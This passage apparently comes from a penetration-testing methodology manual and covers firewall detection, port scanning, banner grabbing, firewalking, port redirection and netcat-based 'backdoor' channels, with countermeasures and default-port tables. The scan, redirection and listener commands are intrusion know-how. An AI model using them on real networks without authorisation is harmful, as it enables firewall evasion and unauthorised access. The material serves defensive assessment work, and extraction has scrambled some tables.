Craft an SYN packet using Hping or any of your favorite packet crafter. If you get ICMP
unreachable type 13 message (which is admin prohibited packet) with an source IP
address of access control device, usually this is a packet filter firewall.
Pre-requisite[s]
None
Examples/Results
Hping www.target.com –c2 –S –p23 –n
HPING www.yourcompany.com (eth0 192.168.0.1): S set, 40 data bytes
ICMP Unreachable type 13 from 192.168.100.100
Analysis/Conclusion/Observation
•
It gives ICMP unreachable type 13 from 192.168.100.100
•
Its an admin prohibited packet
•
General it signifies access control system (Firewall/Router)
Countermeasures
Disable admin prohibited packets (ICMP type 13 messages) at border router
•
For Cisco > no IP destination unreachables
•
Refer to the product manual
Block outgoing traffic originating from the firewall
Tool[s]
•
Hping
•
TCP Traceroute
Further Reading[s]
Remarks
Page 624 of 1123
Page 625 of 1123
L.9.2 Traceroute and Identify Possible Network Range
Description
Traceroute will tell you several things about a network. These several things are:
•
the path to that network
•
intermediate routers and/or devices
•
potential information about filtering devices potential information about allowed
protocols
•
Consider some facts
o
Generally firewall will not return ICMP TTL expired messages
o
In small and medium size networks firewall is located one hop before target
o
In large networks you will get big network range and difficult to identify firewall
By default windows system uses ICMP messages and UNIX/Linux system uses UDP
messages while performing trace route.
Pre-requisite[s]
Steps to be performed
•
Traceroute on ICMP, UDP and TCP towards target
•
Analyze the results
•
o
Where ICMP messages were dropped / rejected?
o
Where UDP messages were dropped / rejected?
o
Where TCP messages were dropped / rejected?
Identify possible network range
Examples/Results
ICMP
UDP
TCP
10 (XXX.XXX.10.1)
10 (XXX.XXX.10.1)
10 (XXX.XXX.10.1)
11 (XXX.XXX.20.2)
11 (XXX.XXX.20.2)
11 (XXX.XXX.20.2)
12 (XXX.XXX.30.3)
12 (XXX.XXX.30.3)
12 (XXX.XXX.30.3)
13 (XXX.XXX.40.4)
13 (XXX.XXX.40.4)
13 (XXX.XXX.40.4)
14 (XXX.XXX.50.5)
14 (XXX.XXX.50.5)
14 (XXX.XXX.50.5)
Page 626 of 1123
15 (XXX.XXX.60.6)
15 (XXX.XXX.60.6)
15 (XXX.XXX.60.6)
16 (XXX.XXX.70.7)
16 (XXX.XXX.70.7)
16 (XXX.XXX.70.7)
17 (XXX.XXX.80.8)
17 (XXX.XXX.80.8)
17 (XXX.XXX.80.8)
18 (XXX.XXX.90.9)
18 (XXX.XXX.90.9)
18 (XXX.XXX.90.9)
19 * * *
19 (XXX.XXX.100.10)
19 (XXX.XXX.100.10)
20 * * *
20 * * *
20 **
21 * * *
21 **
22(XXX.XXX.110.11) [open]
Analysis/Conclusion/Observation
ICMP requests are blocked beyond hop 18, IP address 18 (XXX.XXX.90.9)
UDP request are blocked beyond hop 19, IP address 19 (XXX.XXX.100.10)
TCP requests using HTTP Port 80 pass through to the target host on hop 22. IP address
(XXX.XXX.110.11).
It was observed that the intermediate host (at hop No. 20 and 21) does not disclose it’s IP
address/device name/domain name.
Attempts to guess the device IP address at hop No. 21 and 21 was failed in range
xxx.xxx.110.x to xxx.xxx.110.x
Tool[s]
Traceroute utility (traceroute on *nix and tracert on windows)
Countermeasures
Prevention Mechanism
•
Restrict access control mechanism (Router/Firewall) to respond against TTL expired
packets
> access-list 151 deny ip any any 110 ! ttl-exceeded
Detection Mechanism
Configure Network Intrusion Detection Mechanism to monitor for ICMP, UDP and TCP
packets with TTL = 1
Further Reading[s]
Remarks
Page 627 of 1123
L.9.3 Perform Port Scan on Default Firewall Ports and Grab Banners
Port scanning is easy to perform but noisy still good result can be obtained by a structure
approach:
1
Use information gathered from publicly available sources on firewall implemented in
target network (if found any) and scan only on those default firewall ports.
2
Give priority to information which you feel more reliable
3
Send very minimal connections (2 connection per host should be appropriate) to
avoid detection (although “good” firewalls should not have any problems with lots of
connections nowadays)
4
If you are lucky and find an open port, identify the service by establishing a
connection on the relevant service of that port.
5
If you haven’t found the default port, randomize the scan (by using multiple
source/destination ports and hosts) multiple and perform it on all default firewall ports
mentioned in appendix of firewall default port list and if you know any more
6
Finally if you haven’t got any success from above steps, scans the entire network
range on all ports using followings scanning techniques
Page 628 of 1123
L.9.4 Perform Port Scan on Default Firewall Ports and Grab Banners –
Port Scanning
Description
Most firewall implementations have default ports in use for remote management purposes
or other purposes (such as user authentication, vpn solutions, High Availability…)
Pre-requisite[s]
None
Examples/Results
#nmap –n –vv –P0 –p256, 1080 <www.target.com>
Analysis/Conclusion/Observation
•
-P0 disables ICMP messages
•
-vv gives very verbose output. It helps in identifying firewall architecture / system
Countermeasures
To prevent port scan against firewall, block scans on gateway router itself:
In case of Cisco use this to block scan against a CheckPoint Firewall-1 system
Access-list 101 deny tcp any any equal 256 log
Access-list 101 deny tcp any any equal 257 log
Access-list 101 deny tcp any any equal 258 log
Access-list 101 deny tcp any any equal 259 log
Use a “Stealth” Rule which blocks all traffic towards the firewall.
Also use detection mechanism to get hold against stealthy scan. Tune your network
Intrusion Detection System to detect slower scans. Adjust “trigger” – x number of ports in y
time and x number of hosts in y time to detect host scan. Note: It may trigger false positive.
Disable all default ports on the firewall if these are not required for the good working of the
firewall.
Tool[s]
•
Nmap
•
Hping
Page 629 of 1123
Further Reading[s]
For the Firewall Default Port Table Refer to the Appendix
Remarks
Page 630 of 1123
L.9.5 Perform Port Scan On Default Firewall Ports and Grab Banners –
Banner Grabbing
Description
•
A banner can tell what type and version of service is been use
•
It can tell the Operating Service version which is running
•
A banner can be read by connecting to the service (e.g. FTP, SMTP, Web)
Firewall proxies have history for information leakage. They show their type and version
easily.
Pre-requisite[s]
•
Banner grabber
•
Target IP Addresses / Host Name / Domain Name
•
Access to service
Steps to be performed
Connect with telnet or netcat to the corresponding port and wath the replies.
Examples/Results
Example 1
Grabbb –s –t 10 –a xxx.xxx.xxx.xxx –b xxx.xxx.xxx.xxx –m –v –t <port number of the
service>
Example 2
#nc –vv –n 192.168.0.1 257
(UNKNOWN) [192.168.0.1] 257 (?) open 31000000
Example 3: Checkpoint FW-1 Client Authentication
#nc -vv –n 192.168.0.1 259
(UNKNOWN) [192.168.0.1] 257 (?) open
Check Point Firewall-1 Client Authentication Server running on dev-fwcoreprimus
Example 4: Symantec Enterprise Firewall 8.0 Telnet Proxy
Page 631 of 1123
C:\> telnet 192.168.0.1
Secure Gateway.
Hostname:
Hostname:
Example 5: Symantec Enterprise Firewall 8.0 HTTP Proxy
C:\>nc -nvv 192.168.0.1 80
HEAD / HTTP/1.0
HTTP/1.1 503 Service Unavailable
MIME-Version: 1.0
Server: Simple, Secure Web Server 1.1
Date: Fri, 17 Sep 2004 19:08:35 GMT
Connection: close
Content-Type: text/html
<HTML>
<HEAD><TITLE>Firewall Error: Service Unavailable</TITLE></HEAD>
Analysis/Conclusion/Observation
Tool[s]
NetCat, Grabbb, Languard, telnet
Countermeasures
•
Remove or change the default banner of firewall
•
Block firewall/router default ports at border router
Further Reading[s]
For the Firewall Default Port Table Refer to the Appendix
Remarks
Note: As per the first rule of firewall everything except management station would be
denied. Generally one is not going to get much on this.
Page 632 of 1123
L.9.6 Custom Packets
Description
Creating custom packets that are sent towards the firewall can elicit unique responses from
the firewall. This can also be used to determine the type of firewall.
Examples/Results – One – SYN packet and RST / ACK
hping 192.168.0.1 –c 2 –S –p 23 –n
HPING 192.168.0.1 (eth0 192.168.0.1): S set, 40 data bytes
60 bytes from 192.168.0.1: flags=RA seg=0 ttl=59 id=0 win=0 time=0.4 ms
Analysis/Conclusion/Observation
1. It gives RST / ACK packets, it indicates:
•
Packet passed through the firewall and no port was open on target (192.168.0.1)
Or
•
Firewall rejected the packets
2. While performing against CheckPoint FW-1, hping shows source IP of target
(192.168.0.1). CheckPoint FW-1 really generates this message. (Only if the firewall is
allowed to send out packets originating from the firewall)
3. RST / ACK packets should be able to tell which host sent the packet by the TTL
Examples/Results – Two – SYN packet and no response
hping 192.168.0.1 –c 2 –S –p 23 –n
HPING 192.168.0.1 (eth0 192.168.0.1): S set, 40 data bytes
Analysis/Conclusion/Observation
1. In this example we don’t receive any response back. It means:
•
Firewall dropped the packet or
•
The packet was lost in the wire
2. It still indicates, a firewall is drooping packet instead of rejecting packets
Tool[s]
Countermeasures
Disable admin prohibited packets (ICMP type 13 messages) at border router
Page 633 of 1123
•
For Cisco > no IP unreachables
•
Refer product manual
Further Reading[s]
Remarks
Page 634 of 1123
L.9.7 Access Control List Enumeration
Description
Nmap does a good job on this front. It can tell you which ports are in block state. Nmap
shows three states of ports
1. Open 2. Filtered and 3 Unfiltered
•
Open – port is listening
•
Filtered – port is blocked by an access control device (Router/Firewall)
•
Unfiltered – traffic is passing from access control devices (Firewall/Router) but the
port is not open
How Nmap decides a port is in filter state?
Its based on three criteria’s:
1. No SYN/ACK packet[s]
2. No RST/ACK packet[s]
3. ICMP destination unreachable message with code 13
Pre-requisite[s]
•
Scanning tool: nmap
•
Destination host domain name / IP Address
Examples/Results – Nmap ACK scan
#nmap –sA 192.168.0.1
Interesting ports on 192.168.0.1:
(The 65530 ports scanned but not shown below are in state: filtered)
PORT
STATE
SERVICE
110/tcp UNfiltered pop-3
13701/tcp UNfiltered VeritasNetbackup
13711/tcp UNfiltered VeritasNetbackup
13721/tcp UNfiltered VeritasNetbackup
13782/tcp UNfiltered VeritasNetbackup
Nmap run completed -- 1 IP address (1 host up) scanned in 12205.371 seconds
Analysis/Conclusion/Observation
Page 635 of 1123
Above indicates traffic passing from access control device (Firewall/Router) but the port is
not open on access control device (Firewall/Router)
Examples/Results –
#nmap –p20,21,22,23,53,80,110,111 –n –P0 –vv
When performing this nmap scan, you should run tcpdump simultaneously to see the
responses from the firewall gateway.
Analysis/Conclusion/Observation
Device in above example seems to be a firewall
Examples/Results –
Analysis/Conclusion/Observation
Example Three – Nmap FIN Scan
5145/tcp open rmonitor_secure
5190/tcp open aol
5191/tcp open aol-1
5192/tcp open aol-2
5193/tcp open aol-3
5232/tcp open sgi-dgl
5236/tcp open padl2sim
5300/tcp open hacl-hb
5301/tcp open hacl-gs
Analysis/Conclusion/Observation
•
Example Three – FIN scan is unreliable and gives a lot false positives
Tool[s]
NetCat, Grabbb, Languard
Countermeasures
Disable admin prohibited packets (ICMP type 13 messages) at border router
•
For Cisco > no IP unreachables
Page 636 of 1123
•
Refer product manual
Further Reading[s]
Remarks
Page 637 of 1123
L.9.8 Identify Firewall Architecture
Description
Hping is a very good tool for custom packet crafting. It allows assessor to identify Open,
Blocked, Dropped and Rejected packets.
Using an nmap ACK scan to an open and closed port of a system behind the firewall
(together with a sniffer), one can detect the firewall type in use (packetfilter, statefull firewall
or proxy firewall)
Pre-requisite[s]
Steps to be performed
1. Run Nmap and start a network Sniffer simultaneously
Examples/Results
#nmap –p20,21,22,23,53,80,110,111 –n –P0 –vv
# nmap –sA –p 1,80 <server-behind-firewall>
Analysis/Conclusion/Observation
On the nmap scan, you should look for RST packets. Performing an ack scan of a server
directly connected will show RST packets for both open and closed port. A server behind a
packetfilter will show a RST for a closed port and nothing for an open port. A server
protected by a statefull firewall will show no RST packets at all in the sniff output.
Tool[s]
Nmap, tcpdump (or any other sniffer)
Countermeasures
•
Remove or change the default banner of firewall
•
Block firewall/router default ports at border router
Further Reading[s]
Page 638 of 1123
Remarks
Note: As per the first rule of firewall everything except management station would be
denied. Generally one is not going to get much on this.
Page 639 of 1123
L.10 IDENTIFY COMMON MISS-CONFIGURATION[S]
This applies all tests that are mentioned in Router Miss-configuration section
L.11 FIREWALL RULE-SET MAPPING
L.11.1
Firewalking
Description
Firewall rule base miss-configuration / rule-set mapping are done using firewalk and hping.
Firewalk can be used to discover open ports behind a firewall and it can be used for access
control list discovery.
•
Helps determine open ports on a firewall (packet filter)
•
Port scan (TCP & UDP) done with packets whose TTL is set one greater than the hop
count of the filtering device.
•
o
If TTL error message comes back port opened
o
If nothing comes back, port is filtered
Nmap can differentiate between what is open on the end machine & what is being
firewalled. ( open => open on the end machine, closed => closed on end machine,
filtered => blocked on firewall. This is thru for packetfilter & statefull filters only).
•
Firewalk determines if a given port is allowed through a F/W
•
Traceroute to any machine behind the firewall or the router before the firewall
•
Once the hop count of the router is known, we can change our TTL value for our IP
packet to be 1 more than the hop count of the router & perform a port scan on the
firewall.
•
Thus if “TTL exceeded error” comes back then port on the firewall is open
Firewalk often provides unpredictable results and some time you may face problem while
compiling it. It has a GUI version.
Pre-requisite[s]
•
Hop before the Access Control Device
Page 640 of 1123
•
Hop after the Access Control Device
Steps to be performed
Examples/Results
Source IP
Destination IP
Service
192.168.0.1
192.168.100.100
TCP
Flag
Port TCP 1
Result
Remarks
Drop
Service
Multiplexer
192.168.0.1
192.168.100.101
Compressnet
TCP 2
Drop
192.168.0.1
192.168.100.102
ftp-data
TCP 20
Drop
192.168.0.1
192.168.100.103
File
Transfer TCP 21
Drop
[Control]
192.168.0.2
192.168.100.104
SSH
TCP22
Drop
192.168.0.2
192.168.100.105
Telnet
TCP 23
Drop
192.168.0.2
192.168.100.106
SMTP
TCP 25
Accept
192.168.0.2
192.168.100.107
HTTP
TCP 80
Accept
192.168.0.2
192.168.100.108
HTTP
TCP 80
Drop
Analysis/Conclusion/Observation
Tool[s]
•
hping
•
firewalking
Countermeasures
•
Don’t allow the firewall to send out packets before the drop rule (the last rule in a “good”
firewall rulebase)
•
Don’t allow the firewall to send out icmp error messages
Further Reading[s]
Remarks
Page 641 of 1123
L.11.2
Hpinging
Description
Firewall rule base miss-configuration / rule-set mapping can be done using hping.
•
Helps determine open ports on a firewall (packet filter)
•
Port scan (TCP & UDP) done with packets whose TTL is set one greater than the hop
count of the filtering device.
o
If TTL error message comes back port opened
o
If nothing comes back, port is filtered
•
Traceroute to any machine behind the firewall or the router before the firewall
•
Once the hop count of the router is known, we can change our TTL value for our IP
packet to be 1 more than the hop count of the router & perform a port scan on the
firewall.
•
Thus if “TTL exceeded error” comes back then port on the firewall is open
Hping is mostly used for Firewall Detection purposes.
Pre-requisite[s]
•
Traceroute dump towards the target(s)
Steps to be performed
•
Hping towards the gateway
•
Hping towards the firewall
•
Hping towards the system behind the firewall
Examples/Results
# hping –S –c 1 –p <port> <IP Address> -t <TTL>
Ö port is an open port on the system behind the firewall (find it with portscanning)
Ö IP Address is the system you are hpinging (the system behind the firewall)
Ö TTL is the hop count of the system you are hpinging
Analysis/Conclusion/Observation
In the second step, you could receive and ICMP error message back from the firewall with
its IP address (in badly configured firewalls).
Tool[s]
hping
Countermeasures
Page 642 of 1123
To prevent your firewall sending out its IP address, restrict your firewall from sending out
packets.
Further Reading[s]
Remarks
Page 643 of 1123
L.12 PORT REDIRECTION
Description
•
If an assessor failed to get direct access to a port, port redirection is his best friend.
It is used to bypass port filtering.
•
Install Port redirector and make it listen on a selected port number
•
Packets received on the listening port number are forwarded to desired port on
remote host
Examples/Results
Assessor with WinXP machine - 192.168.10.10
c:> net use \\192.168.10.20\ipc$ abctest /u:administrator
Assessor with Linux machine - 192.168.10.20
# datapipe 139 80 192.168.10.30
NT/Unix host - 192.168.10.30
fpipe –l 80 –r 139 192.168.10.40
or
datapipe 80 139 192.168.10.40
Windows XP victim - 192.168.10.40
Wait for connections
Analysis/Conclusion/Observation
•
An open crystal clear channel can be establish with differing operating systems
•
Access control devices can be circumvented if device access control lists (ACLs) do
not block all the ports
Countermeasures
•
Allow traffic based on services access policy. A services access policy clearly defines
what traffic is allowed inside network and what traffic is allowed to go out from network
and rest everything is denied. Authenticate outbound traffic as per your policy.
•
Have a policy to review logs
•
Implement Network and Host based intrusion detection systems
Tool[s]
Page 644 of 1123
Datapipe – datapipe-1.0.tar.gz
Netcat – http://www.atstake.com/research/tools/index.html
Fpipe – http://www.foundstone.com
Further Reading[s]
Remarks
This works for packet filters and statefull inspection firewalls but NOT for proxy level
firewalls!!
Page 645 of 1123
L.13 FIREWALL BACKDOORS
L.13.1
Covert Channels
Cover channels are a subliminal channel of communication; which hides that a message
is being passed. It’s not Encryption, its concealment.
Note: There is no explicit specification for the number of simultaneous channels on a
given port, but in vast majority of the systems on the Internet, it is limited to 1024.
Hiding in plain sight
•
Embedding a message within a regular communication channel
o
E.g. embed data in the payload of a ‘ping’ (ICMP) packet
•
Only the sender and receiver understand the hiding technique
•
A covert channel may be defined as any communication channel that can be
exploited by a process to transfer information in a manner that violates a
system's security policy.
More Sophisticated Methods
•
Utilize TCP/IP header fields
•
6 bits reserved in TCP header for future use
•
Usually not examined by security mechanisms
Refer ISSAF Methodology section for more details on Covert Channels.
L.13.2
Filters
Daemon Shell-UDP. Bind to an allowed source port (e.g. 20)
Steps to be performed:
Step 1:
On Assessor Machine type following:
Page 646 of 1123
#nc –p 25 <target system IP address> 5000
Step 2:
On Target system type followings:
#nc –l –v –n –p 5000
L.13.3
Stateful Filters
•
Reverse telnets
•
Tunnel from Phrack 52
•
ssh with the –R options
•
ssh with the –L options
L.13.4
Application Level Firewalls
Reverse www shell
•
It allows an assessor to access a machine on your internal network from the
outside
•
It simply looks like an internal user is browsing the web.
•
Its entire traffic is base 64 encoded
•
It runs on specific time (slave) in a day
•
The assessor needs to install a simple Trojan program on a machine in your
network, the Reverse WWW shell server.
•
The Reverse WWW shell server spawns a back channel to the master
•
As assessor types into the master system, the command is retrieved and
executed on the target system.
L.14 COUNTERMEASURES
•
Allow traffic based on services access policy. A services access policy clearly
defines what traffic is allowed inside network and what traffic is allowed to go out
from network and rest everything is denied. Authenticate outbound traffic as per your
policy. (for example: webservers should not be able to connect to the internet …)
Page 647 of 1123
•
Use application proxies, its difficult to establish back channels when they are in use.
But off-course it’s not impossible.
L.15 COMPROMISE REMOTE USERS/SITES
A single hole is sufficient to expose entire network. Doesn’t matter how much secure
your perimeter network is.
Security between remote users/sites and enterprise network only secures them. What if
the remote users/sites are compromised?
Assessor should try to compromise remote users, telecommuter and/or remote sites of
an enterprise. It will give privileged access to internal network.
Countermeasure
•
Implement proper security at remote sites.
•
Use desktop firewall on remote users’ desktops, telecommuter laptops. Preferably a
central managed desktop firewall solution which can not be disabled by the users.
•
Implement host based intrusion detection and prevention mechanism on remote
users’ desktops, telecommuter laptops.
•
Have a separate access control policy for remote users/telecommuter and/or remote
sites.
Examples:
•
Cyberarmor
•
Checkpoint SecureClient
•
Symantec Client Security / Symantec VPN Client
L.16 TEST PRODUCT SPECIFIC ISSUES
L.16.1
Access Control List (ACL) Issues and Source Port
Scanning
•
In many implementations it’s common to find access control devices simply allow
excessive traffic in or out.
Page 648 of 1123
•
It is easy for attacker to scan target network by choosing following source port:
o
20 – FTP Data
o
25 - SMTP
o
53 - DNS
o
80 - Web
o
110 – POP3
o
1024 and above
#nmap –sS <target IP address> -g20
•
Beware – nmap with –g switch misses open ports!
-g switch is only a request as per man page “Note that this is only a request – nmap will
honor it only if and when it is able to”
•
Try strobe with –P switch
Countermeasures
•
Allow traffic based on services access policy. A services access policy clearly
defines what traffic is allowed inside network and what traffic is allowed to go out
from network and rest everything is denied.
L.16.2
•
Checkpoint Firewall-1 Issues
CheckPoint allows followings ports by default from any host to any host and no
logging is performed on this.
o
UDP 53 – DNS Query
o
TCP 53 – DNS Zone transfer
o
UDP 520 – Routing Information Protocol (RIP)
This is no longer the case for Checkpoint FW-1 NG
•
It doesn’t show this in main rule page. Its part of implicit rules and options remains in
global properties (Policy Æ Properties tab)
Further reading
http://oliver.efri.hr/~crv/security/bugs/Others/fw-5.html
Page 649 of 1123
L.16.2.1
STATEFUL INSPECTION SUBTERFUGE
L.16.2.2
CHECKPOINT 4.0 INTER-MODULE AUTHENTICATION WEAKNESS
CheckPoint 4.0 inter-module authentication weakness exposes firewall’s other IP
Addresses. Refer this for more detail http://www.dataprotect.com/bh2000
L.16.3
TCP Fast Mode Issues
L.16.4 FWZ Encapsulation Issues
L.16.5
CheckPoint NG Issues
The default open ports are 264 & 18264 (described more in detail in the firewall ports
doc)
L.16.6
•
Nokia IPSO Issues
HTTP Configuration
o
It doesn’t require encryption
o
It doesn’t have any Access Control Lists implemented
•
Telnet is enabled by default
•
Pre-hardened, administrator is probably not worried about security
Countermeasures
•
Configure Access Control Lists to administer HTTP
•
configure HTTPS to be used instead of HTTP
•
Disable Telnet, use SSH instead
L.16.7
Cisco PIX Issues
L.16.8
Microsoft Proxy Issues
L.16.9
IP Chains Issues
•
Linux IP 2.2.0 kernel
o
Attacker may bypass packet filtering rules
o
Fragmentation Attack
o
Rewrite part of the TCP / UDP header
Page 650 of 1123
o
Port information is rewritten in order to gain access to ports tht should be
blocked by the firewall
•
Fragrouter can be used to launch the attack
Refer this for more detail: http://www.dataprotect.com/ipchains
L.17 GLOBAL COUNTERMEASURES
•
Have a DROP ALL rule (has to be the last rule in your rulebase)
•
Have a STEALTH rule (dropping all traffic towards your firewall) – preferably the
first rule
•
Prevent your firewall from sending out packets originating from the gateway
•
Prevent the usage of “ANY” in the rule-base (for both services as for source
and/or destinations)
•
Disable or change the default settings of firewalls as much as possible
Page 651 of 1123
L.18 DEFAULT PORTS - FIREWALL
L.18.1.1
SONICWALL
Service
Port
Service Identified
Available To
TCP/UDP 23
TELNET
Private
TCP 67
BOOTPS
Private
UDP 69
TFTP
Private
TCP 80
HTTP
Private
TCP/UDP 137
NETBIOS
Private
UDP 500
ISAKMP
Private
Service Identified
Available To
Listening
L.18.1.2
Service
Listening
Comments
NOKIA
Port
Comments
TCP, 23
Telnet
TCP, 80
HTTP
TCP, 256
FWl-1 Management
TCP, 259
FWl-1 Management
TCP, 262
FWl-1 Management
Communication
Management
TCP, 900
FWl-1 Management
between Nokia
Purpose
TCP, 1149
FWl-1 Management
Appliance and
Î Open
TCP, 1150
FWl-1 Management
Management server
By default
TCP, 1151
FWl-1 Management
TCP, 1152
FWl-1 Management
Page 652 of 1123
TCP, 1153
FWl-1 Management
TCP, 1154
FWl-1 Management
TCP, 18183
FWl-1 Management
TCP, 18184
FWl-1 Management
UDP, 161
FWl-1 Management
UDP, 259
FWl-1 Management
UDP, 514
FWl-1 Management
L.18.1.3
Service
Communication
Management
between Nokia
Purpose
Appliance and
Î Open
Management server
By default
ZYWALL
Port
Service Identified
Available To
TCP 21
FTP
Private
TCP 23
Telnet
Private
Service Identified
Available To
Listening
L.18.1.4
Service
Listening
Comments
NETASQ
Port
Comments
NETASQ
TCP 1300
FIREWALL
Private
MANAGER
TCP 1302
NETASQ Firewall
Monitor
PRIVATE
Page 653 of 1123
L.18.1.5
Service
WATCHGUARD SOHO
Port
Service Identified
Available To
TCP 21
FTP
Private
TCP 53
DNS
Private
UDP 53
DNS
Private
Ports Open by
UDP 67
Bootps
Private
default
TCP 80
HTTP
Private
TCP 1080
Socks
Private
Listening
Comments
Page 654 of 1123
L.18.1.6
Service
LUCENT ACCESS POINT 300
Port
Service Identified
Available To
TCP 22
SSH
Private & Public
TCP 23
Telnet
Private & Public
TCP 80
HTTP
Private & Public
UDP 123
NTP
Private & Public
UDP 161
SNMP
Private & Public
TCP 443
HTTPS
Private & Public
UDP 500
ISAKMP
Private & Public
UDP 514
SYSLOG
Private & Public
UDP 520
RIP
Private & Public
UDP 1701
L2TP
Private & Public
UDP 8127
AP SLA Probe
Private & Public
UDP 65534
Loop back Address
Private & Public
Listening
Comments
Page 655 of 1123
L.18.1.7
Service
WATCHGUARD VCLASS
Port
Service Identified
Available To
TCP 22
SSH
Private
TCP 23
Telnet
Private
UDP 161
SNMP
Private
TCP 443
SSL
Private
UDP 500
IKE
Private
Listening
Centralized
UDP 1024
Policy
Manager (CPM)
Heart
UDP 1850
Private
Comments
Ports Open by
default
Beat
to
centralized managers
Private
Used by HA modules
to
TCP 6789
hot
synch
configuration
between
two
Private
HA
units
L.18.1.8
Service
Listening
TCP 443
TCP 443
ZYWALL
Port
Service Identified
SSL
Web
based
administration
SSL
Web
administration
based
Available To
Private
Comments
Used
administration
Public
Page 656 of 1123
for
L.18.1.9
Service
CISCO IOS FIREWALL
Port
Service Identified
Available To
TCP 23
Telnet
Private
UDP 67
DHCP
Private
UDP 68
DHCP
Private
TCP 80
HTTP
Private
UDP 1985
HSRP
Private
Management
Service Identified
Available To
Comments
TCP 443
HTTPS
Private
ICMP/8
Echo request
Private
Open by default
Service Identified
Available To
Comments
UDP 53
DNS
Private
Open by default
TCP 80
HTTP
Private
Administration/open
ICMP/8
Echo Request
Private
Open by default
ICMP/13
Timestamp Request
Private
Open by default
Listening
L.18.1.10
Service
Service
Listening
Open by default
CISCO PIX FIREWALL
Port
Listening
L.18.1.11
Comments
Administration/Open
by default
BROADCOM FIREWALL
Port
Page 657 of 1123
L.18.1.12
FORTIGATE FIREWALL
Service
Port
Listening
SSL
TCP 443
L.18.1.13
Service Identified
Web
based
administration
Available To
Comments
Private
Administration/open
Available To
Comments
MICROSOFT ISA FIREWALL
Service
Port
Listening
TCP/UDP 135
Service Identified
RPC ENDPOINT
MAPPER
Private
UDP 137
NetBios name
Private
UDP 138
NetBios Datagram
Private
TCP 139
NetBios Session
Private
TCP/UDP 445
MS directory service Private
UDP 500
ISAKMP
Private
TCP 1025
Windows internal
Private
TCP 1080
Socks
Private
TCP/UDP 1745
Firewall client control
session
Private
TCP 8080
ISA Web proxy
Private
ICMP/8
Echo request
Private
ISA NAT port pool
Private
TCP/UDP range 3000
to 3700
Open by Default
Page 658 of 1123
L.18.1.14
Service
NETSCREEN FIREWALL
Port
Service Identified
Available To
TCP 23
Telnet
Private
TCP 80
HTTP
Private
TCP 443
HTTPS
Private
ICMP/8
Echo Request
Private
Open by default
Service Identified
Available To
Comments
FW1_ICS_Service
Private
Management/open
Service Identified
Available To
Comments
TCP, 80
HTTP
Private
TCP, 81
Web based Mgmt
Private
UDP 123
NTP
Private
UDP 161
SNMP
Private
TCP 389
LDAP
Private
Listening
L.18.1.15
Service
Port
TCP 18264
Service
Listening
TCP 413
Administration/open
NORTEL ASF
Listening
L.18.1.16
Comments
NOVELL BORDER MANAGER
Port
Storage
Mgmt
Service protocol
Administration/open
Open by default
Private
TCP 427
Storage Location
Private
UDP 427
Storage Location
Private
Page 659 of 1123
TCP 443
Web
based
administration
Private
UDP 520
RIP
Private
TCP 524
NCP
Private
UDP 524
NCP
Private
TCP 636
LDAP Over SSL
Private
TCP 2000
CS Audit Proxy
Private
TCP 2200
TCP 2211
Web
based
administration
Web
Private
Administration/open
based
administration
Private
TCP 3351
B treive
Private
TCP 6000
X windows
Private
TCP 6901
Jet Stream
Private
TCP 8008
TCP 8009
TCP 21571
TCP 40193
ICMP/8
Web
based
administration
Web
Licensing
Service
Storage
management Req.
Echo Request
Private
Administration/open
based
administration
Novell
Open by default
Private
Private
Private
Open by default
Private
Page 660 of 1123
L.18.1.17
Service
NETGEAR PROSAFE
Port
Service Identified
Available To
TCP 80
HTTP
Private
TCP 443
HTTPS
Private
Listening
L.18.1.18
Service
Port
Available To
ICMP/8
Echo Request
Private
TCP 21
FTP proxy
Private
TCP 113
Auth
Private
TCP 3053
Management Control
Private
TCP 4105
Administration/open
WATCHGUARD FIREBOX
Service Identified
Listening
Comments
Management
connection
Control
Private
Comments
Management/Open
by default
TCP 4110
DVCP VPN manager
Private
TCP 4111
High availability
Private
TCP 9001
Management Control
Private
TCP 4100
Authentication
Private
Needs to configure
Page 661 of 1123
L.18.1.19
Service
CHECKPOINT FIREWALL
Port
Service Identified
Available To
Comments
256 /tcp
FW1
Private
Management
257 /tcp
FW1_log
Private
258 /tcp
FW1_mgmt
Private
259 /tcp
FW1_clntauth
Listening
FW1_clntauth_telnet
Private
259 /udp
RDP
Private
260 /udp
FW1_snmp
Private
261 /tcp
FW1_snauth
Private
264 /tcp
FW1_topo
Private
265 /tcp
FW1_key
Private
900 /tcp
FW1_clntauth
FW1_clntauth_http
Private
981 /tcp
- not predefined -
Private
2746 /udp
VPN1_IPSEC_encapsulation Private
5004 /udp
MetaIP-UAT
Private
8116 /udp
- not predefined -
Private
9281 /udp
SWTP_Gateway
Private
9282 /udp
SWTP_SMS
Private
18182 /tcp
FW1_ufp
Private
18183 /tcp
FW1_sam
Private
18184 /tcp
FW1_lea
Private
18185 /tcp
FW1_omi
Private
18186 /tcp
FW1_omi-sic
Private
18187 /tcp
FW1_ela
Private
Page 662 of 1123
18190 /tcp
CPMI
Private
18191 /tcp
CPD
Private
L.18.1.20
Service
CHECKPOINT FIREWALL
Port
Service Identified
Available To
18192 /tcp
CPD_amon
Private
18193 /tcp
FW1_amon
Private
18202 /tcp
CP_rtm
Private
18205 /tcp
CP_reporting
Private
18207 /tcp
FW1_pslogon
Private
18208 /tcp
FW1_CPRID
Private
18209 /tcp
- not predefined -
Private
18210 /tcp
FW1_ica_pull
Private
18211 /tcp
FW1_ica_push
Private
18212 /udp
FW1_load_agent
Private
18221 /tcp
CP_redundant
Private
18231 /tcp
FW1_pslogon_NG
Private
18232 /tcp
FW1_sds_logon
Private
18233 /udp
FW1_scv_keep_alive
Private
18234 /udp
tunnel_test
18241 /udp
E2ECP
Private
18262 /tcp
CP_Exnet_PK
Private
18263 /tcp
CP_Exnet_resolve
Private
18264 /tcp
FW1_ica_services
Listening
18265/tcp
FW1_ica_mgmt_tools
Comments
Management
Private
Private
Private
Management/
Open by default/
Management
Page 663 of 1123
19190 /tcp
FW1_netso
Private
19191 /tcp
FW1_uaa
Private
19194 /udp
CP_SecureAgent-udp
Private
19195 /udp
CP_SecureAgent-udp
Private
65524 /tcp
FW1_sds_logon_NG
Private
Page 664 of 1123
L.18.1.21
Service
SYMANTEC ENTERPRISE FIREWALL
Port
Service Identified
Available To
TCP 21
FTP
Private & Public
TCP 23
TELNET
Private & Public
TCP 25
SMTP
Private & Public
TCP 80
HTTP
Private & Public
TCP 416
Firewall Mgmt Port
Private & Public
TCP 417
Firewall Mgmt Port
Private & Public
Listening
TCP 418
FW
Remote
Port
UDP 500
ISAKMP
TCP 888
OOB-Daemon
TCP 2456
TCP 1344
Mgmt
Web
Comments
Private & Public
Private & Public
based
Management Port
AV scan engine
